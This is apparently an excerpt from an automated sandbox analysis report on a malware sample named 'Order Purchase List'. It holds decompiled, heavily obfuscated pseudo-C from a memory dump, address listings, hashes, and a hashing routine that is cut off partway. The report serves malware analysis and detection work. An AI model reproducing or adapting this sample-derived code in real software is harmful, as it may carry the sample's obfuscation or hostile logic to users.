									__esi =  *0x2d3cdd6b * 0x127f;
									_t60 = __esp;
									__esp =  *0xa00c4903;
									 *0xa00c4903 = _t60;
									asm("rcl byte [0x8a8ef084], 0xeb");
									 *0x54e32189 =  *0x54e32189 << 0x1e;
									asm("sbb esp, [0x99838235]");
									 *0xe80bd1f1 =  *0xe80bd1f1 - __ebp;
									_pop(__esp);
									_push(0xeda4f927);
									asm("sbb edi, [0xe1381fed]");
									__esp =  *0xa00c4903 -  *0x92d506f0;
									__esp =  *0xa00c4903 -  *0x92d506f0 - 1;
									_push( *0xc901715);
									__ecx = __ecx +  *0x6fe557a3;
									__eflags = __ecx;
									asm("sbb ebp, 0xc16ef911");
									if(__ecx < 0) {
										__eflags = __esi -  *0x4e96e071;
										 *0x3a78ab07 =  *0x3a78ab07 + __esi;
										__eflags =  *0x3a78ab07;
										if( *0x3a78ab07 == 0) {
											__ebx = 0xb00309;
											asm("ror dword [0x44172816], 0x9c");
											__edi = __edi +  *0xacea85ba;
											__al = __al | 0x0000002a;
											 *0xb28d76c6 =  *0xb28d76c6 >> 0xf4;
											__ecx = __ecx ^  *0x1b9de127;
											__eflags = __ecx;
											if(__ecx <= 0) {
												__edx =  *0x8ac1547f * 0x1fb5;
												__ebx =  *0x99ae1a11;
												 *0x99ae1a11 = 0xb00309;
												__eax = __eax &  *0xc13e2295;
												L1();
												__esi & 0x0466a2e8 =  *0x98fdfd0f &  *0x99ae1a11;
												__ebx = 0x81c3c9b;
												__ebx =  *0x90d8540f;
												 *0x90d8540f = 0x81c3c9b;
												__bl = __bl -  *0x5c41cb4;
												L1();
												__ecx = __ecx ^  *0xc3f0d0e8;
												asm("adc dh, 0x86");
												asm("sbb [0x593c59ea], edx");
												_push(__edi);
												__eflags = __bl - 0x86;
												if(__bl >= 0x86) {
													__esi =  *0x9be1be7c * 0x5316;
													asm("sbb [0x761003e1], dh");
													 *0xe76a2d3 =  *0xe76a2d3 << 0xac;
													__esi =  *0x9be1be7c * 0x5316 - 1;
													asm("sbb dh, 0x63");
													_pop(__ecx);
													__ah = __ah | 0x000000a2;
													 *0xd33c9e2f =  *0xd33c9e2f + __esp;
													__esi =  *0x9be1be7c * 0x00005316 - 0x00000001 ^ 0x2203953e;
													__esp = __esp - 1;
													__edi = __edi -  *0x3a8a2693;
													_push( *0x9d5480ba);
													asm("rol byte [0xd704e43a], 0xe");
													__eflags = __ebp - 0x5278ef09;
													asm("cmpsb");
													__ebp = __ebp |  *0x3b46e3f0;
													__esi =  *0x83a192c0;
													 *0x83a192c0 =  *0x9be1be7c * 0x00005316 - 0x00000001 ^ 0x2203953e;
													 *0xd84f9ce5 =  *0xd84f9ce5 ^ __al;
													asm("rcl dword [0xf38380d6], 0xa");
													 *0x52d56634 = __ah;
													__eflags =  *0x23e0388 & __dh;
													if(( *0x23e0388 & __dh) < 0) {
														__edx = __edx +  *0xd0142071;
														asm("rcl byte [0x4e268763], 0xe");
														__al = 0xf9;
														asm("rcr dword [0x851a9dbb], 0xfc");
														asm("sbb bh, [0xa1fd9a30]");
														__eflags = __edx & 0x4ac34fcc;
														__ecx = __ecx ^ 0xb3ab60d5;
														__al =  *0x86cdbcf6;
														__esp = __esp + 1;
														 *0x30456919 =  *0x30456919 >> 0xa2;
														_push(__ecx);
														 *0xe57b58cb =  *0xe57b58cb ^ __esi;
														__edx = __edx + 0x4efcacde;
														__eax = __eax + 1;
														__eflags =  *0x1c9a0e0a & __ah;
														 *0x26582de =  *0x26582de - __esi;
														asm("ror dword [0x2afef709], 0xb5");
														__esi =  *0x97b5abc2;
														__eflags = __edx & 0xdd447711;
														L1();
														__eflags = __esp -  *0xab3dcde8;
														asm("adc ebp, [0x764b52bb]");
														__eflags = __bl -  *0xfd8b1910;
														asm("movsb");
														 *0x5b2c193c =  *0x5b2c193c | __al;
														_t76 = __al;
														__al =  *0xe574b2b2;
														 *0xe574b2b2 = _t76;
														_t77 = __ebx;
														__ebx =  *0x13ebfd25;
														 *0x13ebfd25 = _t77;
														 *0x40a692ff =  *0x40a692ff | __esp;
														asm("sbb ebx, [0x11810c9f]");
														__eflags = __esp & 0x2ef5eebc;
														asm("adc edi, [0x29bfe88f]");
														 *0x326aeb04 =  *0x326aeb04 << 0xdd;
														 *0x6d1d6514 =  *0x6d1d6514 >> 0xd4;
														__ecx = __ecx + 0x8bfcbebb;
														asm("adc [0x81d33d2a], ah");
														_t80 = __eax;
														__eax =  *0x68a4a16f;
														 *0x68a4a16f = _t80;
														__bh = __bh & 0x000000b5;
														__esi =  *0x97b5abc2 -  *0x5f73161e;
														__eflags = __esi;
														if(__esi == 0) {
															 *0x6f212e7a =  *0x6f212e7a ^ __edx;
															asm("rol byte [0x926b2eb2], 0x15");
															 *0xc065cc25 =  *0xc065cc25 << 0x94;
															__cl = __cl | 0x000000d7;
															_t81 = __esi;
															__esi =  *0x8d0171e;
															 *0x8d0171e = _t81;
															__eflags =  *0x69dc008f & __edx;
															__eax = 0xb1591ade;
															asm("adc edi, [0xbae8f519]");
															 *0x60ddb708 =  *0x60ddb708 << 0xd9;
															__edx = __edx & 0xf3d45cd8;
															 *0xc0b06586 =  *0xc0b06586 | __bh;
															__cl = __cl +  *0xc0546304;
															__eflags = __cl;
															__dl = 0x20;
															asm("adc [0xd2b5481d], ebx");
															__edi = 0xb2c50bbf;
															if(__cl <= 0) {
																__eax =  *0xac6cc17f * 0x5eec;
																asm("rcr byte [0x14f0e42a], 0xf5");
																asm("movsb");
																asm("sbb ecx, [0x79ce1331]");
																 *0x6e7e2cf5 = __esp;
																asm("adc [0xfc512d21], esp");
																__ecx = __ecx + 0x98acc899;
																__dh = 4;
																asm("adc esp, [0x25137f3b]");
																asm("cmpsw");
																_pop( *0xfea5087);
																__edx = __edx - 1;
																asm("rcr dword [0x99fe4129], 0xe1");
																__eflags = __al - 0xb5;
																asm("adc ecx, [0xe321c8e]");
																asm("rol dword [0xd4a5081], 0x5f");
																asm("movsb");
																if(__al < 0xb5) {
																	__eflags = __ebp & 0x36c43673;
																	if((__ebp & 0x36c43673) != 0) {
																		asm("ror dword [0x5894a474], 0x4e");
																		asm("adc [0x8d3d193c], cl");
																		__esi = __esi |  *0x95c95317;
																		__ch = __ch | 0x0000002a;
																		__ebp & 0x6878009e = __al & 0x000000b3;
																		if((__al & 0x000000b3) > 0) {
																			__esp =  *0x4664bf7e * 0x8b89;
																			__edi = 0xffffffff82400b99;
																			asm("adc ch, 0x3c");
																			asm("movsb");
																			__esp =  *0x4664bf7e * 0x8b89 -  *0x4a0dc6fe;
																			__eax = __eax + 1;
																			__al = __al ^  *0xa8277424;
																			asm("movsb");
																			 *0x193c5807 =  *0x193c5807 | 0xb2c50bbf;
																			__eflags = __esp - 0xa9098d3d;
																			if(__esp <= 0xa9098d3d) {
																				__eflags = __esi - 0x2d707077;
																				__ah = __ah ^  *0x1e019412;
																				asm("sbb ebx, 0xbc04c50f");
																				__eflags = __bh -  *0x87c98cf6;
																				asm("adc esp, [0xc25791ee]");
																				__edx -  *0xa03af811 =  *0xa3bfa12 & 0x00000020;
																				__eax = __eax + 1;
																				__esp =  *0xba2fec8;
																				 *0x52b485bf =  *0x52b485bf | __ebp;
																				_pop(__ebx);
																				asm("rcr dword [0xe89c0899], 0x3f");
																				__ecx = __ecx + 0xa9e60bd1;
																				__eflags = __ebx;
																				__ebx =  *0x494d21bc;
																				if(__eflags >= 0) {
																					__eflags = __ecx & 0xf0fc6f70;
																					 *0x8cc5781b =  *0x8cc5781b << 7;
																					_t94 = __esp;
																					__esp =  *0x9e270996;
																					 *0x9e270996 = _t94;
																					__eax = __eax &  *0xcb60b296;
																					__edi =  *0x31abb9c7;
																					 *0x31abb9c7 = 0xffffffff82400b99;
																					 *0x3dfeb2c7 =  *0x3dfeb2c7 >> 0x49;
																					__edi =  *0x31abb9c7 |  *0xf2ae5623;
																					 *0xd17d4e66 & __edx =  *0xd7f0f70d - __ebx;
																					__dh = 0x30;
																					__eflags = __esp - 0x8bb0ddf;
																					_pop(__eax);
																					asm("rcr byte [0x8d3d193c], 0xbc");
																					__ebx = __ebx |  *0x37221419;
																					 *0xdf0185b4 =  *0xdf0185b4 >> 0x10;
																					_pop(__esp);
																					 *0x94f9cc09 =  *0x94f9cc09 & __ebp;
																					 *0x764b3da8 =  *0x764b3da8 - 4;
																					asm("sbb esi, [0x1fcb1adb]");
																					__edi = ( *0x31abb9c7 |  *0xf2ae5623) & 0xd2b5481d;
																					asm("sbb [0xd0480ebf], edi");
																					 *0x836aa5d0 =  *0x836aa5d0 | __bl;
																					 *0xaf9e8fea = __ecx;
																					__dl = 0x20 -  *0x970ef5e7;
																					_push( *0xdb93410b);
																					__esi = __esi + 1;
																					_push(__ebp);
																					__esi =  *0x6f704913;
																					asm("ror dword [0xca0bf0fc], 0xda");
																					__ebp = __ebp +  *0x638773c4;
																					__eflags = __esi -  *0x6f704917;
																					asm("adc eax, [0x10bf0fc]");
																					__dl = 0x20 -  *0x970ef5e7 + 8;
																					__eflags = __al -  *0x4c12a022;
																					__ecx = __ecx - 1;
																					__eflags = __ecx;
																					if(__ecx >= 0) {
																						__eflags =  *0xf0fc6f70 & __edi;
																						__dl = __dl +  *0x2322770a;
																						asm("sbb eax, [0x3fb0b70e]");
																						asm("sbb [0xb714686], ch");
																						_push( *0x24b9cbd6);
																						asm("rol byte [0x21f1f6a2], 0xc7");
																						__ebp = 0x14f0e53d;
																						__eflags = __edi -  *0x6f0e79b9;
																						asm("adc ebx, 0xc2469d37");
																						__edx = __edx + 1;
																						asm("sbb ecx, 0x7185f6cc");
																						__esi = __esi &  *0xa379c4c8;
																						__ch = __ch - 0xe4;
																						__ebp = 0x14f0e53d ^  *0x3f137f25;
																						__eflags = 0x14f0e53d;
																						if(0x14f0e53d >= 0) {
																							__ebp =  *0x1273337c * 0x1757;
																							__eflags = __ebp;
																							if(__ebp >= 0) {
																								 *0xf69ef572 =  *0xf69ef572 >> 0x55;
																								asm("sbb [0x8739b2f1], ebx");
																								__bl = __bl ^ 0x00000018;
																								asm("sbb ecx, [0xa4a48fe]");
																								_push( *0xe8b919c);
																								__esi = __esi |  *0xc05024f3;
																								__eflags = __esi;
																								_push(__ebp);
																								if(__esi < 0) {
																									 *0x62321871 =  *0x62321871 >> 0x22;
																									__ebp = __ebp +  *0x1fee4e16;
																									__dh = 0x30 -  *0x84de3ec9;
																									asm("adc edi, [0x2488dda3]");
																									__eax = __eax + 1;
																									__eflags = __ecx -  *0xff14de64;
																									__esp = __esp + 0x1d1eda13;
																									_t100 = __eax;
																									__eax =  *0x53241939;
																									 *0x53241939 = _t100;
																									 *0x9d53afe =  *0x9d53afe << 0x9f;
																									asm("adc bl, [0x4dab24b1]");
																									 *0xb8a70d97 =  *0xb8a70d97 +  *0x53241939;
																									_push(__edx);
																									__edx = __edx |  *0xbb32ff06;
																									__eflags =  *0xb5481d32 & __bh;
																									__bh = 0xd2;
																									asm("adc ebp, 0xd43e11bf");
																									asm("adc [0x7e54edeb], ebp");
																									__ebp = __ebp + 1;
																									asm("adc esi, 0x82f34116");
																									 *0x3db25f8c = __esi;
																									 *0xbb0c3ce6 =  *0xbb0c3ce6 << 0x91;
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L1:
				_pop( *0x2a529409);
				_t109 = _t109 + 0x78c1d903;
				_t113 = _t113 -  *0x550d1e30;
				_push(_t129);
				asm("sbb bl, 0xd0");
				asm("adc [0x5e9ea6c9], bl");
				_t105 = _t105 &  *0xee0c8d29;
				asm("adc ebx, [0x311d046c]");
				asm("sbb ecx, 0xc989e08c");
				asm("lodsd");
				_push(_t109);
				_t129 = _t129 - 1;
				asm("rcl byte [0x3fbd9008], 0xe");
				_t132 = _t132 - 1;
				_t123 = _t123 - 0xb1242c2e;
				if((_t103 & 0x1ab4b105) < 0) {
					asm("sbb [0xed0dd771], edx");
					 *0x98a9087 =  *0x98a9087 - _t132;
					asm("adc ecx, [0xd3d3b435]");
					if( *0x98a9087 <= 0) {
						asm("adc [0x8d574f77], ebx");
						_pop(_t129);
						_push( *0x74104a36);
						asm("lodsd");
						_t137 = _t137 ^ 0x79383833;
						asm("rcr dword [0xc5d262bf], 0x61");
						asm("rol dword [0x640a03eb], 0x1e");
						asm("sbb ebp, [0x76fe1429]");
						asm("sbb bl, [0x711e2f82]");
						_push( *0x53b27e09);
						_t105 = 0x287ca813 -  *0x99051ecf;
						 *0xd7ab022f =  *0xd7ab022f >> 0xe0;
						_t109 = 0xa;
						_t113 = ((_t113 |  *0x3fb272eb) &  *0xe555ddf2) +  *0xaf2e830b;
						asm("rol byte [0xb64a5934], 0x33");
						_t123 = _t123;
						if(_t123 < 0) {
							asm("sbb edx, [0x6aaf0a71]");
							_push(0x811d5329);
							_t132 = _t132 - 1;
							_t129 = _t129 - 1;
							if(_t129 < 0) {
								_t113 = _t113 ^  *0x11030f71;
								 *0x6df80ce0 =  *0x6df80ce0 + 0xa;
								 *0x8de945f3 =  *0x8de945f3 ^ 0x287ca813;
								_t105 = _t105 + 0xa0;
								asm("rol byte [0x50590312], 0x7d");
								asm("sbb dh, [0x5305c024]");
								_t103 = _t103 & 0x799f3c83;
								_pop(_t125);
								_pop( *0xfdc51691);
								 *0xb15653a9 =  *0xb15653a9 >> 0x83;
								asm("sbb [0x8a15626c], eax");
								_t123 = _t125 + 1;
								_t109 = 0x25ce0183 +  *0x2bd1fb8f & 0x000000ca;
								if(_t109 < 0) {
									asm("stosb");
									asm("rcl byte [0x33670730], 0x95");
									 *0x614bdadb =  *0x614bdadb | _t129;
									_t132 = 0x8200a671;
									if( *0x614bdadb <= 0) {
										 *0x962d1bf0 =  *0x962d1bf0 + 0x287ca813;
										asm("adc edx, [0xe73ac826]");
										 *0x2f3f1ccb =  *0x6a261e7f * 0xd13b -  *0x3509b8dc;
										 *0xbd0901df =  *0xbd0901df >> 0x97;
										_t139 = _t137 - 1 +  *0x9c9eb206;
										_pop(_t126);
										 *0xab3e2fc4 =  *0xab3e2fc4 ^ _t103;
										 *0xe82cce68 =  *0xe82cce68 ^ _t132;
										 *0xe3cd41ea = _t103;
										_t109 = _t109 + 1;
										 *0x1f4f8938 =  *0x1f4f8938 ^ _t109;
										asm("rcr dword [0x3cb441f3], 0xf1");
										_t123 = (_t126 - 0x00000001 |  *0xaa92b917) &  *0x48242bde;
										asm("adc [0x704bccc9], cl");
										 *0xec116eb6 = _t103 -  *0x4c2f0d80;
										_t105 =  *0x38028e97;
										_t103 =  *0xad2fb260 * 0x81d;
										_push(_t139);
										 *0xfe811d01 = _t132 ^ 0xca1c871b;
										asm("movsw");
										_t137 =  *0x312dedfd;
										 *0x312dedfd = _t139;
										_t129 = _t129 + 1;
										 *0x38ec6138 =  *0x38ec6138 >> 0xd0;
										_t121 =  *0xd4d909d1;
										 *0xd4d909d1 =  *0x2f3f1ccb + 0x00000001 & 0x00000038;
										 *0xb1e0c89 =  *0xb1e0c89 << 0x80;
										 *0xf202931b =  *0xf202931b - _t121;
										_t113 = _t121 ^ 0x000000e6;
										_t132 =  *0x96049ebe;
										asm("adc ecx, [0x890ef031]");
										 *0xef5459e5 =  *0xef5459e5 ^ _t103;
										asm("sbb eax, 0x486a0e97");
										 *0xe78fc910 =  *0xe78fc910 - _t105;
									}
								}
							}
						}
					}
				}
				goto L1;
			}

0x0041bcf2
0x0041bcf8
0x0041bcfe
0x0041bd05
0x0041bd0b
0x0041bd11
0x0041bd1b
0x0041bd1c
0x0041bd22
0x0041bd22
0x0041bd28
0x0041bd2e
0x0041bd2e
0x0041bd2e
0x0041bd34
0x0041bd3b
0x0041bd3e
0x0041bd44
0x0041bd4a
0x0041bd51
0x0041bd57
0x0041bd5d
0x0041bd5e
0x0041bd65
0x0041bd6b
0x0041bd71
0x0041bd74
0x0041bd7a
0x0041bd7d
0x0041bd7e
0x0041bd7f
0x0041bd81
0x0041bd87
0x0041bd8e
0x0041bd8f
0x0041bd95
0x0041bd9b
0x0041bda1
0x0041bda7
0x0041bda8
0x0041bdae
0x0041bdaf
0x0041bdb6
0x0041bdbc
0x0041bdbd
0x0041bdc3
0x0041bdc6
0x0041bdc6
0x0041bdc7
0x0041bdcd
0x0041bdd3
0x0041bdd9
0x0041bddf
0x0041bde5
0x0041bdeb
0x0041bdf1
0x0041bdf7
0x0041bdf8
0x0041bdfe
0x0041be04
0x0041be0a
0x0041be0d
0x0041be13
0x0041be15
0x0041be1c
0x0041be22
0x0041be28
0x0041be2e
0x0041be35
0x0041be3b
0x0041be41
0x0041be48
0x0041be4e
0x0041be50
0x0041be56
0x0041be5c
0x0041be61
0x0041be68
0x0041be69
0x0041be6f
0x0041be75
0x0041be7b
0x0041be81
0x0041be87
0x0041be88
0x0041be8e
0x0041be9a
0x0041bea0
0x0041bea2
0x0041bea5
0x0041bea6
0x0041beb0
0x0041beb7
0x0041bebd
0x0041bebe
0x0041bec4
0x0041bec7
0x0041bec8
0x0041bece
0x0041beda
0x0041bee0
0x0041bee2
0x0041bee9
0x0041beef
0x0041bef5
0x0041bef5
0x0041befb
0x0041bf00
0x0041bf06
0x0041bf0c
0x0041bf12
0x0041bf18
0x0041bf1e
0x0041bf24
0x0041bf29
0x0041bf2a
0x0041bf30
0x0041bf33
0x0041bf3a
0x0041bf3a
0x0041bf3a
0x0041bf40
0x0041bf46
0x0041bf47
0x0041bf57
0x0041bf58
0x0041bf5b
0x0041bf61
0x0041bf61
0x0041bf61
0x0041bf67
0x0041bf6a
0x0041bf70
0x0041bf7a
0x0041bf7a
0x0041bf7a
0x0041bf80
0x0041bf87
0x0041bf8e
0x0041bf94
0x0041bf9a
0x0041bf9b
0x0041bfa0
0x0041bfa6
0x0041bfac
0x0041bfad
0x0041bfb3
0x0041bfb3
0x0041bfb9
0x0041bfbf
0x0041bfc5
0x0041bfcb
0x0041bfcb
0x0041bfd1
0x0041bfd7
0x0041bfdd
0x0041bfe4
0x0041bfea
0x0041bfec
0x0041bff3
0x0041bff3
0x0041bff9
0x0041bfff
0x0041c009
0x0041c009
0x0041c00f
0x0041c015
0x0041c020
0x0041c026
0x0041c02c
0x0041c02c
0x0041c032
0x0041c038
0x0041c03d
0x0041c043
0x0041c046
0x0041c04c
0x0041c04d
0x0041c050
0x0041c056
0x0041c060
0x0041c066
0x0041c06d
0x0041c06e
0x0041c071
0x0041c072
0x0041c075
0x0041c07b
0x0041c081
0x0041c082
0x0041c088
0x0041c08e
0x0041c095
0x0041c09b
0x0041c09c
0x0041c0a2
0x0041c0a2
0x0041c0a8
0x0041c0ae
0x0041c0b5
0x0041c0bb
0x0041c0c1
0x0041c0c7
0x0041c0cd
0x0041c0d4
0x0041c0d6
0x0041c0dd
0x0041c0e3
0x0041c0e9
0x0041c0ef
0x0041c0f4
0x0041c0f5
0x0041c0fc
0x0041c0fd
0x0041c103
0x0041c109
0x0041c10a
0x0041c110
0x0041c116
0x0041c11d
0x0041c123
0x0041c129
0x0041c12e
0x0041c134
0x0041c13a
0x0041c140
0x0041c141
0x0041c147
0x0041c147
0x0041c147
0x0041c14d
0x0041c14d
0x0041c14d
0x0041c153
0x0041c159
0x0041c15f
0x0041c165
0x0041c16b
0x0041c172
0x0041c179
0x0041c17f
0x0041c185
0x0041c185
0x0041c185
0x0041c18b
0x0041c18e
0x0041c18e
0x0041c194
0x0041c19a
0x0041c1a0
0x0041c1a7
0x0041c1ae
0x0041c1b1
0x0041c1b1
0x0041c1b1
0x0041c1b7
0x0041c1bd
0x0041c1c2
0x0041c1c8
0x0041c1cf
0x0041c1d5
0x0041c1db
0x0041c1db
0x0041c1e1
0x0041c1e3
0x0041c1e9
0x0041c1ee
0x0041c1f4
0x0041c1fe
0x0041c205
0x0041c206
0x0041c20c
0x0041c212
0x0041c218
0x0041c21e
0x0041c220
0x0041c226
0x0041c228
0x0041c22e
0x0041c22f
0x0041c236
0x0041c238
0x0041c23e
0x0041c245
0x0041c246
0x0041c24c
0x0041c252
0x0041c258
0x0041c25f
0x0041c265
0x0041c26b
0x0041c274
0x0041c276
0x0041c27c
0x0041c286
0x0041c28c
0x0041c28f
0x0041c290
0x0041c296
0x0041c297
0x0041c29d
0x0041c29e
0x0041c2a4
0x0041c2aa
0x0041c2b0
0x0041c2b6
0x0041c2bc
0x0041c2c2
0x0041c2c8
0x0041c2d4
0x0041c2da
0x0041c2db
0x0041c2e1
0x0041c2e7
0x0041c2e8
0x0041c2ef
0x0041c2f5
0x0041c2f6
0x0041c2fc
0x0041c302
0x0041c308
0x0041c30f
0x0041c30f
0x0041c30f
0x0041c315
0x0041c31b
0x0041c31b
0x0041c321
0x0041c328
0x0041c334
0x0041c33a
0x0041c33d
0x0041c343
0x0041c344
0x0041c34b
0x0041c351
0x0041c358
0x0041c359
0x0041c35f
0x0041c365
0x0041c36b
0x0041c371
0x0041c377
0x0041c37d
0x0041c383
0x0041c389
0x0041c38f
0x0041c390
0x0041c391
0x0041c397
0x0041c39e
0x0041c3a4
0x0041c3aa
0x0041c3b0
0x0041c3b3
0x0041c3b9
0x0041c3b9
0x0041c3ba
0x0041c3c0
0x0041c3c6
0x0041c3cc
0x0041c3d2
0x0041c3d8
0x0041c3de
0x0041c3e5
0x0041c3eb
0x0041c3f1
0x0041c3f7
0x0041c3f8
0x0041c3fe
0x0041c404
0x0041c407
0x0041c407
0x0041c40d
0x0041c413
0x0041c413
0x0041c41d
0x0041c423
0x0041c42a
0x0041c430
0x0041c433
0x0041c439
0x0041c43f
0x0041c43f
0x0041c445
0x0041c446
0x0041c44c
0x0041c453
0x0041c459
0x0041c45f
0x0041c465
0x0041c466
0x0041c46c
0x0041c472
0x0041c472
0x0041c472
0x0041c478
0x0041c47f
0x0041c485
0x0041c48b
0x0041c48c
0x0041c492
0x0041c498
0x0041c49a
0x0041c4a0
0x0041c4a6
0x0041c4a7
0x0041c4ad
0x0041c4b3
0x0041c4b3
0x0041c446
0x0041c41d
0x0041c40d
0x0041c3ba
0x0041c2fc
0x0041c2aa
0x0041c276
0x0041c252
0x0041c246
0x0041c1ee
0x0041c194
0x0041c0c1
0x0041c050
0x0041bff9
0x0041bfd1
0x0041bfbf
0x0041bf47
0x0041bf0c
0x0041bdc7
0x0041bd28
0x0041b8d6
0x0041b8d6
0x0041b8dc
0x0041b8e2
0x0041b8e8
0x0041b8e9
0x0041b8f2
0x0041b8f8
0x0041b8fe
0x0041b904
0x0041b90a
0x0041b90b
0x0041b90c
0x0041b90d
0x0041b914
0x0041b915
0x0041b920
0x0041b922
0x0041b928
0x0041b92e
0x0041b934
0x0041b936
0x0041b942
0x0041b956
0x0041b95c
0x0041b95d
0x0041b963
0x0041b970
0x0041b978
0x0041b97e
0x0041b984
0x0041b990
0x0041b996
0x0041b99d
0x0041b99f
0x0041b9a5
0x0041b9ac
0x0041b9ad
0x0041b9b3
0x0041b9b9
0x0041b9be
0x0041b9c2
0x0041b9c3
0x0041b9c9
0x0041b9cf
0x0041b9d5
0x0041b9e1
0x0041b9e4
0x0041b9eb
0x0041b9f7
0x0041ba02
0x0041ba09
0x0041ba15
0x0041ba22
0x0041ba28
0x0041ba29
0x0041ba2c
0x0041ba37
0x0041ba38
0x0041ba3f
0x0041ba45
0x0041ba46
0x0041ba5c
0x0041ba63
0x0041ba69
0x0041ba6f
0x0041ba76
0x0041ba7c
0x0041ba7d
0x0041ba83
0x0041ba89
0x0041ba8f
0x0041ba90
0x0041baa2
0x0041babc
0x0041bace
0x0041bad4
0x0041bad9
0x0041badf
0x0041baec
0x0041baf3
0x0041baf9
0x0041bafb
0x0041bafb
0x0041bb02
0x0041bb0f
0x0041bb16
0x0041bb16
0x0041bb22
0x0041bb2f
0x0041bb35
0x0041bb3e
0x0041bb4a
0x0041bb5c
0x0041bb62
0x0041bb67
0x0041bb6d
0x0041ba46
0x0041ba2c
0x0041b9c3
0x0041b9ad
0x0041b934
0x00000000

Strings

wpp-, xrefs: 0041C2B0
Wh;, xrefs: 0041BAC2
xR, xrefs: 0041C095

Memory Dump Source

Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd

Yara matches

Similarity

API ID:
String ID: Wh;$xR$wpp-
API String ID: 0-1705525878
Opcode ID: 6c666c1fa6ac295a51c90b93466e6fa23fba3945e02348c155ed1dde0e1409e3
Instruction ID: c7626d7d8be2404d7d1ac6495aa1db854b920f805c25f5bdd5c53e20fd29778a
Opcode Fuzzy Hash: 6c666c1fa6ac295a51c90b93466e6fa23fba3945e02348c155ed1dde0e1409e3
Instruction Fuzzy Hash: 12428532908785CFDB06DF38C88AB913FB6F752724B08425FD5A193192E7382556CB89

Uniqueness

Uniqueness Score: -1.00%

Function 00408C90, Relevance: 1.7, Strings: 1, Instructions: 423
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E00408C90(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t325;
				signed int _t334;
				signed int _t340;
				signed int _t341;
				signed int _t346;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t362;
				signed int _t365;
				signed int _t369;
				signed int _t370;
				signed int _t399;
				signed int _t404;
				signed int _t410;
				signed int _t413;
				signed int _t420;
				signed int _t423;
				signed int _t432;
				signed int _t434;
				signed int _t437;
				signed int _t445;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t470;
				signed int _t478;
				signed int _t479;
				signed int* _t480;
				signed int* _t481;
				signed int _t488;
				signed int _t491;
				signed int _t496;
				signed int _t499;
				signed int _t502;
				signed int _t505;
				signed int _t506;
				signed int _t510;
				signed int _t522;
				signed int _t525;
				signed int _t532;
				void* _t536;

				_t481 = _a4;
				_t353 = 0;
				_t2 =  &(_t481[7]); // 0x1b
				_t277 = _t2;
				do {
					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t353 = _t353 + 4;
					_t277 =  &(_t277[0x10]);
				} while (_t353 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t399 =  *(_t278 - 0x18);
					_t459 =  *(_t278 - 0x14);
					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
					_t278[8] = _t357;
					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t318 ^ _t399;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
				} while ( *_t46 != 0);
				_t320 =  *_t481;
				_t279 = _t481[1];
				_t358 = _t481[2];
				_t404 = _t481[3];
				_v12 = _t320;
				_v16 = _t481[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t462 = _v8;
					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t323 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t404;
					_v12 = _t488;
					asm("rol esi, 0x5");
					_v8 = _t358;
					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t491 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t362 = _v12;
					_v8 = _t323;
					_t325 = _v8;
					_v12 = _t410;
					asm("rol edx, 0x5");
					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t413 = _v12;
					_v16 = _t491;
					asm("ror ecx, 0x2");
					_v8 = _t362;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t325;
					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t358 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t413;
					_v12 = _t496;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
